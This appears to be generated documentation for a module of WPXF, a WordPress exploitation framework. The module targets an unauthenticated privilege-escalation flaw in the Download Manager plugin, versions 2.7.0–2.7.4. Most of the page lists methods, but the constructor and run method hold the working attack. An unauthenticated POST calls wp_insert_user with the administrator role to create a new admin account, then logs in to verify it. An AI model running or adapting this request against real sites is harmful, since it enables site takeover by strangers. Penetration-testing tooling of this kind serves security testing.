Class: Wpxf::Auxiliary::DownloadManagerPrivilegeEscalation
- Includes:
- Wpxf, WordPress::Login
- Defined in:
- lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
-
#initialize ⇒ DownloadManagerPrivilegeEscalation
constructor
A new instance of DownloadManagerPrivilegeEscalation.
- #password ⇒ Object
- #run ⇒ Object
- #uploads_url ⇒ Object
- #username ⇒ Object
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ DownloadManagerPrivilegeEscalation
Returns a new instance of DownloadManagerPrivilegeEscalation.
9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 9 def initialize super update_info( name: 'Download Manager Privilege Escalation', desc: 'The Download Manager plugin, in versions 2.7.0 to 2.7.4, '\ 'allows unauthenticated users to create new admin users '\ 'due to lack of validation wpdm_ajax_call_exec.', author: [ 'Mickael Nadeau', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['EDB', '35533'], ['WPVDB', '7706'] ], date: 'Dec 3 2014' ) ([ StringOption.new( name: 'username', desc: 'The username to register with', default: Utility::Text.rand_alpha(10) ), StringOption.new( name: 'password', desc: 'The password to register with', default: Utility::Text.rand_alpha(rand(10..20)) ) ]) end |
Instance Method Details
#check ⇒ Object
50 51 52 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 50 def check check_plugin_version_from_readme('download-manager', '2.7.5', '2.7.0') end |
#password ⇒ Object
46 47 48 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 46 def password normalized_option_value('password') end |
#run ⇒ Object
58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 58 def run return false unless super emit_info 'Creating new admin user...' res = execute_post_request( url: full_uri, body: { 'action' => 'wpdm_ajax_call', 'execute' => 'wp_insert_user', 'user_login' => username, 'user_pass' => password, 'role' => 'administrator' } ) emit_info "Response code: #{res.code}", true emit_info "Response body: #{res.body}", true emit_info 'Verifying new account...' if wordpress_login(username, password) emit_success "User #{username} with password #{password} successfully created" return true else emit_error 'Failed to create new user' return false end if res.nil? || res.timed_out? emit_error 'No response from the target' return false end return true end |
#uploads_url ⇒ Object
54 55 56 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 54 def uploads_url normalize_uri(wordpress_url_wp_content, 'uploads', 'download-manager-files') end |
#username ⇒ Object
42 43 44 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 42 def username normalized_option_value('username') end |